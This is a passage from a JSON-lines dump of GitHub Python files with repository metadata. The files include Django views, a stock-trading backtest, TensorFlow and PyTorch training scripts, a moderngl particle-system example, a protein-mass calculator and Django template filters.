None\n if request.method == 'POST':\n # Take the ID and Delete\n id_to_delete = request.POST['id']\n AccountFundPositionRec.objects.get(id=id_to_delete).delete()\n response = 'account_deleted'\n\n return HttpResponse(response)\n\n\nclass PositionRecAttachmentsView(FormView):\n template_name = 'file_upload.html'\n form_class = PositionRecAttachmentsForm\n success_url = '#'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n queryset = PositionRecAttachments.objects.all()\n context['uploaded_file_list'] = queryset\n return context\n\n def form_valid(self, form):\n data = form.cleaned_data\n original_filename = 'filename'\n position_rec_attachment = data.get('position_rec_attachment')\n if isinstance(position_rec_attachment, InMemoryUploadedFile):\n original_filename = position_rec_attachment._name\n description = data.get('description')\n uploaded_by = data.get('uploaded_by')\n uploaded_on = datetime.now().date()\n PositionRecAttachments.objects.create(position_rec_attachment=position_rec_attachment,\n original_filename=original_filename, description=description,\n uploaded_by=uploaded_by, uploaded_on=uploaded_on)\n return super(PositionRecAttachmentsView, self).form_valid(form)\n\n\ndef delete_ops_file(request):\n response = None\n if request.method == 'POST':\n try:\n id_to_delete = request.POST['id']\n file_object = PositionRecAttachments.objects.get(id=id_to_delete)\n file_field = file_object.position_rec_attachment\n file_object.delete()\n response = 'file_deleted'\n DeleteFile(file_details=file_field, aws_file_key=file_field.file.obj.key,\n aws_bucket=file_field.file.obj.bucket_name, requested_delete_at=datetime.now()).save()\n except Exception as error:\n response = 'Error'\n print('ERROR', error)\n return HttpResponse(response)\n \n","repo_name":"johndpope/WaterIsland_RiskPortal","sub_path":"position_rec/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9477287673","text":"from Ex113 import *\n\ncores = ('\\033[m', # 0 -> limpa\n '\\033[1;31m', # 1 -> Vermelho\n '\\033[1;36m', # 2 -> Azul\n '\\033[1;32m', # 3 -> Verde\n '\\033[1m', # 4 -> Negrito\n '\\033[1;33m', # 5 -> Amarelo\n )\n\n\ndef linha(t=42):\n print(f'{cores[4]}-{cores[0]}'*(t))\n\n\ndef tit(txt):\n linha()\n print(f'{cores[3]}{txt.center(42)}{cores[0]}')\n linha()\n\n\ndef theMenu(lista):\n tit('MENU PRINCIPAL')\n c = 1\n for i in lista:\n print(f'{cores[5]}{c}{cores[0]} - {cores[2]}{i}{cores[0]}')\n c += 1\n linha()\n opc = isInt(f'{cores[5]}Sua Opção:{cores[3]} ')\n print(cores[0])\n return opc\n","repo_name":"genesonio/python","sub_path":"Nova pasta/Exercíciosfinais/Ex115/interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43195767862","text":"#!/bin/python3\n\nimport sys\n\n\ndef diagonal_diff(a):\n x, y = 0, 0\n ix, iy = 0, len(a)-1\n for l in a:\n x += l[ix]\n y += l[iy]\n if ix < len(a) and iy >= 0:\n ix += 1\n iy -= 1\n\n return abs(x - y)\n\nn = int(input().strip())\na = []\nfor a_i in range(n):\n a_t = [int(a_temp) for a_temp in input().strip().split(' ')]\n a.append(a_t)\n\n# print(a)\n\nprint(diagonal_diff(a))\n","repo_name":"teoyenmao/leet_python","sub_path":"diagonal_diff.py","file_name":"diagonal_diff.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71013176078","text":"import pandas as pd\r\nimport warnings\r\nfrom pandas.core.common import SettingWithCopyWarning\r\nimport plotly.graph_objects as go\r\nimport plotly.io as pio\r\n\r\npio.renderers.default='browser'\r\nwarnings.simplefilter(action=\"ignore\", category=SettingWithCopyWarning)\r\n\r\n# Declaring functions ------------------------------------\r\ndef buy(amount, buyAmount, stocks):\r\n value = 0\r\n while (value <= (amount-buyAmount)):\r\n value += buyAmount\r\n stocks += 1\r\n amount -= value\r\n return amount, stocks\r\n\r\ndef sell(amount, sellAmount, stocks):\r\n amount += sellAmount*stocks\r\n stocks = 0\r\n return amount, stocks\r\n\r\ndef profit_loss(startMoney, endMoney):\r\n if endMoney < startMoney:\r\n return (\"Loss : \" + str(endMoney - startMoney))\r\n else:\r\n return (\"Profit : \" + str(endMoney - startMoney))\r\n\r\n\r\n# Importing file ----------------------------------------\r\nexFile = pd.ExcelFile(r\"sample_data.xls\")\r\ndf = exFile.parse()\r\ndf.drop(\"Unnamed: 0\", axis=1, inplace=True)\r\n\r\n\r\n# Creating custom fields --------------------------------\r\nd = [] # Storing date\r\nt = [] # Storing time\r\nr = [] # Storing profit/loss\r\ns = [] # Storing number of stocks currently holding\r\nca = [] # Storing current amount\r\nfor i in range(len(df)):\r\n d.append((df['date'][i])[:10])\r\n t.append((df['date'][i])[11:])\r\n r.append('')\r\n s.append('')\r\n ca.append('')\r\ndf['date'] = d\r\ndf['time'] = t\r\ndf['p/f'] = r\r\ndf['stocks'] = s\r\ndf['current_amount'] = ca\r\n\r\n\r\n# Start of analysis -------------------------------------\r\ncurrentAmount = 100000\r\nstocks = 0\r\ni = 0\r\ncount = 0\r\nwhile (i < len(df)):\r\n currentDate = df['date'][i]\r\n dayAmount = currentAmount\r\n \r\n buyTime = df['time'][i+1]\r\n buyAmount = df['low'][i+1]\r\n currentAmount, stocks = buy(currentAmount, buyAmount, stocks)\r\n df['stocks'][i+1] = stocks\r\n df['current_amount'][i+1] = currentAmount\r\n \r\n sellTime = df['time'][i+23]\r\n sellAmount = df['high'][i+23]\r\n currentAmount, stocks = sell(currentAmount, sellAmount, stocks)\r\n \r\n pf_res = profit_loss(dayAmount, currentAmount)\r\n df['p/f'][i+23] = pf_res\r\n df['stocks'][i+23] = stocks\r\n df['current_amount'][i+23] = currentAmount\r\n \r\n i += 25\r\n count += 1\r\n\r\n\r\n# Creating result dataframe to store in result excel file ----\r\nresult = pd.DataFrame()\r\nresult.index = [i for i in range(count)]\r\nr_d = []\r\nr_r = []\r\n\r\nfor i in range (23, len(df), 25):\r\n r_d.append(df['date'][i])\r\n r_r.append(df['p/f'][i])\r\n\r\nresult['date'] = r_d\r\nresult['result'] = r_r\r\n\r\nresult.to_excel('result.xlsx')\r\n\r\n# Finding maximum profit and loss -----------------------------\r\nfindMaxMin = []\r\nfor i in range(len(r_r)):\r\n ele = r_r[i].split(' ')\r\n findMaxMin.append(float(ele[2]))\r\n\r\nprint(\"Max profit = {}\\nMax loss = {}\\nTotal capital in the end = {}\".format(max(findMaxMin), min(findMaxMin), currentAmount))\r\n\r\n# Plotting graph for overall data ------------------------------\r\ndf_graph = pd.DataFrame()\r\ndf_graph['date'] = r_d\r\ndf_graph['open'] = ['' for i in range(count)]\r\ndf_graph['close'] = ['' for i in range(count)]\r\ndf_graph['high'] = ['' for i in range(count)]\r\ndf_graph['low'] = ['' for i in range(count)]\r\ni = 0\r\nk = 0\r\nwhile (i < len(df)):\r\n df_h = []\r\n df_l = []\r\n for j in range(i, i+25):\r\n df_h.append(df['high'][j])\r\n df_l.append(df['low'][j])\r\n df_graph['open'][k] = df['open'][i]\r\n df_graph['close'][k] = df['close'][i+24]\r\n df_graph['high'][k] = max(df_h)\r\n df_graph['low'][k] = min(df_l)\r\n i += 25\r\n k += 1\r\n \r\nfig1 = go.Figure(data=[go.Candlestick(x = df_graph['date'],\r\n open = df_graph['open'],\r\n high = df_graph['high'],\r\n low = df_graph['low'],\r\n close = df_graph['close'])])\r\nfig1.update_layout(xaxis_rangeslider_visible=False)\r\nfig1.show()\r\n","repo_name":"aryankumar10/analysis-assignment","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41960105601","text":"import unittest\n\nclass prueba(unittest.TestCase):\n # Functions beginning with \"test\" will be ran as a unit test.\n def test_positive_add(self):\n '''Verify that adding positive numbers works''' # Printed if test fails\n self.assertEqual(5, 5)\n\t\nif __name__=='__main__':\n unittest.main()\n\n","repo_name":"EGC-AgoraResultsTest/agora-results-tests","sub_path":"src/main/python/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71119372239","text":"from torch.utils.data import DataLoader\r\nfrom potsdam_data import *\r\nfrom models.UNetFormer import UNetFormer\r\nfrom train_utils import train_one_epoch, evaluate, create_lr_scheduler\r\n\r\ndef create_model(num_classes):\r\n model = UNetFormer(\r\n decode_channels=64,\r\n dropout=0.1,\r\n backbone_name='resnet18',\r\n pretrained=False,\r\n window_size=8,\r\n num_classes=num_classes)\r\n return model\r\n\r\ntrain_batch_size = 1\r\nval_batch_size = 1\r\nbatch_size = 1\r\n\r\ntrain_dataset = PotsdamDataset(data_root='G:/postam_orignal/kaggle/working', mode='train',img_dir='images/test', mask_dir='anns/test',\r\n mosaic_ratio=0.25, transform=train_aug)\r\n\r\nval_dataset = PotsdamDataset(transform=val_aug)\r\ntest_dataset = PotsdamDataset(data_root='G:/postam_orignal/kaggle/working',img_dir='images/test', mask_dir='anns/test',\r\n transform=val_aug)\r\nnum_workers = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8])\r\ntrain_loader = DataLoader(dataset=train_dataset,\r\n batch_size=train_batch_size,\r\n num_workers=num_workers,\r\n pin_memory=True,\r\n shuffle=True,\r\n drop_last=True)\r\n\r\nval_loader = DataLoader(dataset=val_dataset,\r\n batch_size=val_batch_size,\r\n num_workers=num_workers,\r\n shuffle=False,\r\n pin_memory=True,\r\n drop_last=False)\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nmodel = create_model(num_classes=6)\r\nmodel.to(device)\r\nparams_to_optimize = [p for p in model.parameters() if p.requires_grad]\r\noptimizer = torch.optim.SGD(\r\n params_to_optimize,\r\n lr=0.01, momentum=0.9, weight_decay=1e-4,\r\n )\r\n\r\namp = False\r\nscaler = torch.cuda.amp.GradScaler() if amp else None\r\n\r\n # 创建学习率更新策略,这里是每个step更新一次(不是每个epoch)\r\nlr_scheduler = create_lr_scheduler(optimizer, len(train_loader), 10, warmup=True)\r\n\r\nnum_classes = 6\r\nbest_dice = 0\r\n\r\nfor epoch in range(0,10):\r\n \r\n \r\n mean_loss, lr = train_one_epoch(model, optimizer, train_loader, device, epoch, num_classes,\r\n lr_scheduler=lr_scheduler, print_freq=100, scaler=scaler)\r\n confmat = evaluate(model, val_loader, device=device, num_classes=num_classes)\r\n val_info = str(confmat)\r\n print(val_info)\r\n ","repo_name":"Jacky-Android/UNetFormer-biformer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"39142634576","text":"\"\"\"\nEmit particles from mouse positions with random velocities\nadding the current velocity of the mouse pointer.\n\nShows how you can use transform feedback with custom emitting.\nYou can emit with the gpu or cpu. The main trick is to use\ntransform() with the buffer_offset parameter writing to be back\nof the buffer. We use a query object in this example that can\npotentially stall rendering a bit, but it's still orders of\nmagnitude faster than doing everything on the cpu. using\ntransform() with a buffer offset can be used in many creative ways.\n\nThis is similar to pausing and resuming transform feedbacks,\nbut works in GL 3.3 core.\n\n* The geometry shader is used to destroy geometry for expired\n particles.\n* We use a query to count how many primitives the geometry shader\n actually emitted so we can know how many new particles we should\n emit.\n\nWe show 3 different emit methods:\n* Method #1: CPU emitting by manually writing new particles to the end of the buffer.\n This will probably stream up the entire buffer per frame, but is acceptable\n for smaller amount of data.\n* Method #2: CPU emitting by filling a smaller emit buffer to reduce the amount of data we stream per frame\n Here we fill a smaller emit buffer and render that to the end of the output buffer\n to greatly reduce the amount of data we stream to the gpu per frame.\n* Method #3: GPU emitting. A shader simply calculates the new values.\n No buffer streaming. All is on the gpu side. This method is\n orders of magnitude faster than method 1 and 2\n\nEmit particles from mouse positions:\n\n mouse_control = True\n\nEmit particles from a predetermined path:\n\n mouse_control = False\n\n\"\"\"\nimport numpy as np\n\nimport moderngl\nfrom moderngl_window import screenshot\nfrom ported._example import Example\nfrom pyrr import matrix44\n\n\nclass Particles(Example):\n title = \"Particle System Emitter\"\n gl_version = (3, 3)\n aspect_ratio = None\n mouse_control = False\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n # Renders particles to the screen\n self.prog = self.ctx.program(\n vertex_shader='''\n #version 330\n\n uniform mat4 projection;\n\n in vec2 in_pos;\n in vec3 in_color;\n out vec3 color;\n\n void main() {\n gl_Position = projection * vec4(in_pos, 0.0, 1.0);\n color = in_color;\n }\n ''',\n fragment_shader='''\n #version 330\n\n out vec4 f_color;\n in vec3 color;\n\n void main() {\n f_color = vec4(color, 1.0);\n }\n ''',\n )\n\n # Animates / transforms the particles per frame\n self.transform = self.ctx.program(\n vertex_shader='''\n #version 330\n\n in vec2 in_pos;\n in vec2 in_vel;\n in vec3 in_color;\n\n out vec2 vs_vel;\n out vec3 vs_color;\n\n void main() {\n gl_Position = vec4(in_pos, 0.0, 1.0);\n vs_vel = in_vel;\n vs_color = in_color;\n }\n ''',\n geometry_shader='''\n #version 330\n\n layout(points) in;\n layout(points, max_vertices = 1) out;\n\n uniform float gravity;\n uniform float ft;\n\n in vec2 vs_vel[1];\n in vec3 vs_color[1];\n\n out vec2 out_pos;\n out vec2 out_vel;\n out vec3 out_color;\n\n void main() {\n vec2 pos = gl_in[0].gl_Position.xy;\n vec2 velocity = vs_vel[0];\n\n if (pos.y > -1.0) {\n vec2 vel = velocity + vec2(0.0, gravity);\n out_pos = pos + vel * ft;\n out_vel = vel;\n out_color = vs_color[0];\n EmitVertex();\n EndPrimitive();\n }\n }\n ''',\n varyings=['out_pos', 'out_vel', 'out_color'],\n )\n self.mouse_pos = 0, 0\n self.mouse_velocity = 0.001, 0.001 # default value must not be 0. any number is fine\n self.prog['projection'].write(self.projection)\n self.transform['gravity'].value = -.01 # affects the velocity of the particles over time\n self.ctx.point_size = self.wnd.pixel_ratio * 2 # point size\n\n self.N = 25_000 # particle count\n self.active_particles = self.N // 100 # Initial / current number of active particles\n self.max_emit_count = self.N // 100 # Maximum number of particles to emit per frame\n self.stride = 28 # byte stride for each vertex\n self.floats = 7\n # Note that passing dynamic=True probably doesn't mean anything to most drivers today\n self.vbo1 = self.ctx.buffer(reserve=self.N * self.stride)\n self.vbo2 = self.ctx.buffer(reserve=self.N * self.stride)\n # Write some initial particles\n self.vbo1.write(\n np.fromiter(\n self.gen_particles(self.active_particles),\n count=self.active_particles * self.floats,\n dtype='f4',\n )\n )\n\n # Transform vaos. We transform data back and forth to avoid buffer copy\n self.transform_vao1 = self.ctx.vertex_array(\n self.transform,\n [(self.vbo1, '2f 2f 3f', 'in_pos', 'in_vel', 'in_color')],\n )\n self.transform_vao2 = self.ctx.vertex_array(\n self.transform,\n [(self.vbo2, '2f 2f 3f', 'in_pos', 'in_vel', 'in_color')],\n )\n\n # Render vaos. The render to screen version of the transform vaos above\n self.render_vao1 = self.ctx.vertex_array(\n self.prog,\n [(self.vbo1, '2f 2x4 3f', 'in_pos', 'in_color')],\n )\n self.render_vao2 = self.ctx.vertex_array(\n self.prog,\n [(self.vbo2, '2f 2x4 3f', 'in_pos', 'in_color')],\n )\n\n # Setup for emit method #2. The emit buffer size is only max_emit_count.\n self.emit_buffer_elements = self.max_emit_count\n self.emit_buffer = self.ctx.buffer(reserve=self.emit_buffer_elements * self.stride)\n self.emit_buffer_prog = self.ctx.program( # Siple shader just emitting a buffer\n vertex_shader='''\n # version 330\n in vec2 in_pos;\n in vec2 in_vel;\n in vec3 in_color;\n out vec2 out_pos;\n out vec2 out_vel;\n out vec3 out_color;\n void main() {\n out_pos = in_pos;\n out_vel = in_vel;\n out_color = in_color;\n }\n ''',\n varyings=['out_pos', 'out_vel', 'out_color'],\n )\n self.emit_buffer_vao = self.ctx.vertex_array(\n self.emit_buffer_prog,\n [(self.emit_buffer, '2f 2f 3f', 'in_pos', 'in_vel', 'in_color')],\n )\n\n # Setup for method #3: GPU emitting\n self.gpu_emitter_prog = self.ctx.program(\n vertex_shader='''\n # version 330\n #define M_PI 3.1415926535897932384626433832795\n uniform vec2 mouse_pos;\n uniform vec2 mouse_vel;\n uniform float time;\n\n out vec2 out_pos;\n out vec2 out_vel;\n out vec3 out_color;\n\n float rand(float n){return fract(sin(n) * 43758.5453123);}\n void main() {\n float a = mod(time * gl_VertexID, M_PI * 2);\n float r = clamp(rand(time + gl_VertexID), 0.1, 0.9);\n out_pos = mouse_pos;\n out_vel = vec2(sin(a), cos(a)) * r + mouse_vel;\n out_color = vec3(\n rand(time * 1.3 + gl_VertexID), rand(time * 3.4 + gl_VertexID),\n rand(time * 2.0 + gl_VertexID)\n );\n }\n ''',\n varyings=['out_pos', 'out_vel', 'out_color'],\n )\n self.gpu_emitter_vao = self.ctx._vertex_array(self.gpu_emitter_prog, [])\n\n # Query object to inspect render calls\n self.query = self.ctx.query(primitives=True)\n\n def render(self, time, frame_time):\n self.transform['ft'].value = max(frame_time, 0.02)\n\n if not self.mouse_control:\n self.move_mouse(time)\n\n # Cycle emit methods per frame\n method = self.wnd.frames % 3 + 1\n # ---> HARDCODE METHOD HERE <---\n # method = 3\n if method == 1:\n self.emit_cpu_simple(time, frame_time)\n elif method == 2:\n self.emit_cpu_buffer(time, frame_time)\n elif method == 3:\n self.emit_gpu(time, frame_time)\n\n # Swap around objects for next frame\n self.transform_vao1, self.transform_vao2 = self.transform_vao2, self.transform_vao1\n self.render_vao1, self.render_vao2 = self.render_vao2, self.render_vao1\n self.vbo1, self.vbo2 = self.vbo2, self.vbo1\n\n err = self.ctx.error \n if err != \"GL_NO_ERROR\":\n print(err)\n\n def emit_cpu_simple(self, time, frame_time):\n \"\"\"Method #1\n Emit new particles simply by writing new particles to\n to the end of the buffer. This will most likely cause\n the entire buffer to be re-written to the gpu, but is\n probably acceptable for smaller particle amounts.\n \"\"\"\n # Transform all particles recoding how many elements were emitted by geometry shader\n with self.query:\n self.transform_vao1.transform(self.vbo2, moderngl.POINTS, vertices=self.active_particles)\n\n # Emit new particles if needed simply by writing to the end of the buffer (cpu)\n emit_count = min(self.N - self.query.primitives, self.max_emit_count)\n if emit_count > 0:\n self.vbo2.write(\n np.fromiter(self.gen_particles(emit_count), 'f4', count=emit_count * self.floats),\n offset=self.query.primitives * self.stride,\n )\n\n self.active_particles = self.query.primitives + emit_count\n self.render_vao2.render(moderngl.POINTS, vertices=self.active_particles)\n\n def emit_cpu_buffer(self, time, frame_time):\n \"\"\"Method #2\n Emit new particles by writing new ones with the cpu\n to a separate emit buffer. This buffer can be smaller\n than the main particle buffer meaning less buffer\n data to stream to the gpu per frame.\n \"\"\"\n # Transform all particles recoding how many elements were emitted by geometry shader\n with self.query:\n self.transform_vao1.transform(self.vbo2, moderngl.POINTS, vertices=self.active_particles)\n\n emit_count = min(self.N - self.query.primitives, self.emit_buffer_elements, self.max_emit_count)\n if emit_count > 0:\n self.emit_buffer.write(\n np.fromiter(self.gen_particles(emit_count), 'f4', count=emit_count * self.floats)\n )\n self.emit_buffer_vao.transform(\n self.vbo2,\n vertices=emit_count,\n buffer_offset=self.query.primitives * self.stride,\n )\n\n self.active_particles = self.query.primitives + emit_count\n self.render_vao2.render(moderngl.POINTS, vertices=self.active_particles)\n\n def emit_gpu(self, time, frame_time):\n \"\"\"Method #3\n Emit new particles using a shader.\n \"\"\"\n # Transform all particles recoding how many elements were emitted by geometry shader\n with self.query:\n self.transform_vao1.transform(self.vbo2, moderngl.POINTS, vertices=self.active_particles)\n\n emit_count = min(self.N - self.query.primitives, self.emit_buffer_elements, self.max_emit_count)\n if emit_count > 0:\n self.gpu_emitter_prog['mouse_pos'].value = self.mouse_pos\n self.gpu_emitter_prog['mouse_vel'].value = self.mouse_velocity\n self.gpu_emitter_prog['time'].value = max(time, 0)\n self.gpu_emitter_vao.transform(\n self.vbo2,\n vertices=emit_count,\n buffer_offset=self.query.primitives * self.stride,\n )\n\n self.active_particles = self.query.primitives + emit_count\n self.render_vao2.render(moderngl.POINTS, vertices=self.active_particles)\n\n def gen_particles(self, n):\n for _ in range(n):\n # Current mouse position (2 floats)\n yield self.mouse_pos[0]\n yield self.mouse_pos[1]\n # Random velocity (2 floats)\n a = np.random.uniform(0.0, np.pi * 2.0)\n r = np.random.uniform(0.1, 0.9)\n yield np.cos(a) * r + self.mouse_velocity[0]\n yield np.sin(a) * r + self.mouse_velocity[1]\n # Random color (3 floats)\n yield np.random.uniform(0.0, 1.0)\n yield np.random.uniform(0.0, 1.0)\n yield np.random.uniform(0.0, 1.0)\n\n @property\n def projection(self):\n return matrix44.create_orthogonal_projection(\n -self.wnd.aspect_ratio, self.wnd.aspect_ratio,\n -1, 1,\n -1, 1,\n dtype='f4',\n )\n\n def resize(self, width, height):\n \"\"\"Handle window resizing\"\"\"\n self.prog['projection'].write(self.projection)\n\n def mouse_position_event(self, x, y, dx, dy):\n if not self.mouse_control:\n return\n\n self.mouse_pos = (\n (x / self.wnd.width * 2 - 1) * self.wnd.aspect_ratio,\n -(y / self.wnd.height * 2 - 1),\n )\n self.mouse_velocity = dx / 25, -dy / 25\n\n def move_mouse(self, time):\n new_pos = (\n np.sin(time * 2.0) * self.wnd.aspect_ratio * 0.9,\n np.cos(time * 2.0) * 0.15,\n )\n self.mouse_velocity = (\n (new_pos[0] - self.mouse_pos[0]) * 10,\n (new_pos[1] - self.mouse_pos[1]) * 10,\n )\n self.mouse_pos = new_pos\n\n def key_event(self, key, action, modifiers):\n keys = self.wnd.keys\n\n if action == keys.ACTION_PRESS and key == keys.F1:\n screenshot.create(self.wnd.fbo)\n\n\nif __name__ == '__main__':\n Particles.run()\n","repo_name":"moderngl/moderngl","sub_path":"examples/particle_system_emit.py","file_name":"particle_system_emit.py","file_ext":"py","file_size_in_byte":14236,"program_lang":"python","lang":"en","doc_type":"code","stars":1670,"dataset":"github-code","pt":"29"} +{"seq_id":"2673241938","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport tensorflow as tf\n\nfrom tensorflow.python.platform import gfile\n\n# 图片的长宽\nIMAGE_SIZE = 32\n# 图片的种类\nNUM_CLASSES = 10\n\nNUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 50000\nNUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 10000\n\n\ndef input_from_binary(data_dir, batch_size):\n if not data_dir:\n raise ValueError('找不到data的文件目录')\n return distorted_inputs(data_dir=data_dir,\n batch_size=batch_size)\n\n\n# 读取二进制图片\ndef distorted_inputs(data_dir, batch_size):\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i)\n for i in range(1, 6)]\n for f in filenames:\n if not gfile.Exists(f):\n raise ValueError('Failed to find file: ' + f)\n\n # 创建一个队列来读取\n filename_queue = tf.train.string_input_producer(filenames)\n\n # 从队列中读取数据\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n\n # height = IMAGE_SIZE\n # width = IMAGE_SIZE\n\n\n # distorted_image = tf.random_crop(reshaped_image, [height, width, 3])\n\n # 随机水平移动\n # distorted_image = tf.image.random_flip_left_right(distorted_image)\n\n # 随机排序\n # distorted_image = tf.image.random_brightness(reshaped_image,max_delta=63)\n # distorted_image = tf.image.random_contrast(distorted_image,lower=0.2, upper=1.8)\n\n # 减去均值像素,并除以像素方差 (图片标准化)\n float_image = tf.image.per_image_standardization(reshaped_image)\n\n # 确保随机洗牌具有良好的混合性能.\n min_fraction_of_examples_in_queue = 0.4\n min_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN *\n min_fraction_of_examples_in_queue)\n print('Filling queue with %d CIFAR images before starting to train. '\n 'This will take a few minutes.' % min_queue_examples)\n\n # 通过建立一个队列实例生成一批图像和标签\n return _generate_image_and_label_batch(float_image, read_input.label,\n min_queue_examples, batch_size)\n\n\ndef read_cifar10(filename_queue):\n class CIFAR10Record(object):\n pass\n\n result = CIFAR10Record()\n\n # 图片原大小\n label_bytes = 1\n result.height = 32\n result.width = 32\n result.depth = 3\n image_bytes = result.height * result.width * result.depth\n # 总大小\n record_bytes = label_bytes + image_bytes\n\n # 从二进制文件中读取固定长度记录\n reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)\n result.key, value = reader.read(filename_queue)\n # decode_raw操作可以将一个字符串转换为一个uint8的张量。\n record_bytes = tf.decode_raw(value, tf.uint8)\n\n # 首个字节是label,并将uint8转换成int32\n result.label = tf.cast(\n tf.slice(record_bytes, [0], [label_bytes]), tf.int32)\n\n # 剩下的是图片, 从[depth*height*width]变成 [depth, height, width]\n depth_major = tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]),\n [result.depth, result.height, result.width])\n # [depth, height, width] -> [height, width, depth].\n result.uint8image = tf.transpose(depth_major, [1, 2, 0])\n\n return result\n\n\ndef _generate_image_and_label_batch(image, label, min_queue_examples,\n batch_size):\n \"\"\"构建batch\n 输入:\n image: [height, width, 3]\n label: [label]\n\n Returns:\n images: [1, height, width, 3]\n labels: [1]\n \"\"\"\n # 创建一个队列打乱数据, 然后读取从队列中'batch_size' images + labels .\n num_preprocess_threads = 16\n\n images, label_batch = tf.train.shuffle_batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size,\n min_after_dequeue=min_queue_examples)\n\n tf.summary.image('images', images)\n\n labels = tf.reshape(label_batch, [batch_size])\n\n sparse_labels = tf.reshape(labels, [batch_size, 1])\n\n indices = tf.expand_dims(tf.range(0, batch_size), 1)\n\n # 组合\n\n concated = tf.concat([indices, sparse_labels], 1)\n\n dense_labels = tf.sparse_to_dense(concated,\n [batch_size, NUM_CLASSES],\n 1.0, 0.0)\n\n return images, dense_labels\n","repo_name":"wangtianrui/MNIST","sub_path":"cifar_input_data.py","file_name":"cifar_input_data.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20869838322","text":"\"\"\"\n Image-based social media website recognizer.\n\n @author: Jakub Turek\n @contact: jkbturek(at)gmail(dot)com\n @date: 03-05-2013\n @version: 1.0\n\"\"\"\n\n\nclass ImageBasedWebsiteRecognizer:\n def is_image_based_website(self, html, tree_builder, tree_browser, configuration_provider):\n \"\"\"\n @type tree_builder: HTMLTreeBuilder\n @type tree_browser: HTMLTreeBrowser\n @type configuration_provider: ConfigurationProvider\n \"\"\"\n\n configuration = configuration_provider.get_configuration(self)\n\n html_tree = tree_builder.build_tree(html, configuration['parsed_tree_attributes'].split(';'))\n\n repeating_patterns = tree_browser.get_repeated_nodes(html_tree,\n int(configuration['min_images']),\n configuration['repeated_patterns_tags'].split(';'),\n configuration['repeated_patterns_attributes'].split(';'))\n\n for pattern in repeating_patterns:\n if tree_browser.has_mutual_parent(repeating_patterns[pattern]):\n grouped_mutual_children = tree_browser.get_mutual_children(repeating_patterns[pattern],\n configuration['grouped_children_tags'].\n split(';'),\n configuration['grouped_children_attributes'].\n split(';'))\n\n if grouped_mutual_children:\n for group in grouped_mutual_children:\n if tree_browser.has_direct_children(grouped_mutual_children[group],\n configuration['direct_children_tag']):\n return True\n\n return False\n","repo_name":"manisero/SemViii","sub_path":"WEDT/algorithm/imagebasedwebsiterecognizer.py","file_name":"imagebasedwebsiterecognizer.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"3495521223","text":"AAMMFilePath = open(r\"AminoAcidMonoisotopicMassTable.txt\")\r\n\r\nwith AAMMFilePath:\r\n AAMMlist = AAMMFilePath.read().splitlines()\r\n\r\nProteinSeq = input(\"What is the protein sequence for the protein you would like the mass of?\")\r\n\r\nmass = 0\r\nfor AA in ProteinSeq:\r\n for aa in AAMMlist:\r\n if AA == aa[0]:\r\n mass += float(aa[4:])\r\nprint(round(mass,3))\r\n\r\n\r\n\r\n","repo_name":"shawnr-ca/RosalindSolutions","sub_path":"Scripts/CalculatingProteinMass.py","file_name":"CalculatingProteinMass.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"41129898807","text":"from django import template\nimport re\nfrom django.utils.safestring import mark_safe\n\nregister = template.Library()\n\n\n@register.filter\ndef inline_tags(value):\n \"\"\" parses inline tags into valid html \"\"\"\n value = re.sub(r'_([^_]+)_', r'\\1', value)\n return mark_safe(value)\n\n\n@register.filter\ndef strip_tags(value):\n \"\"\" removes all markup tags and returns plain text string \"\"\"\n value = re.sub(r'_([^_]+)_', r'\\1', value)\n return value\n\n\n@register.filter('caption')\ndef insert_span_to(value, marker=':'):\n \"\"\" creates a span from beginning of input string to marker \"\"\"\n html_class = 'inngangsord'\n strip = False\n if marker in value:\n find = r'^(.*?){}'.format(marker)\n replace = r'\\1{}'.format(html_class, '' if strip else marker)\n value = re.sub(find, replace, value, re.M)\n return mark_safe(value)\n\n\n@register.filter('tingo')\ndef insert_tingo(value, marker=':'):\n \"\"\" tingo filter \"\"\"\n html_class = 'inngangsord'\n find = r'^(.{10}\\S*)'\n replace = r'\\1{0}'.format(html_class)\n value = re.sub(find, replace, value, re.M)\n return mark_safe(value)","repo_name":"haakenlid/tassen-dockerize","sub_path":"django/apps/markup/templatetags/parse_markup.py","file_name":"parse_markup.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} 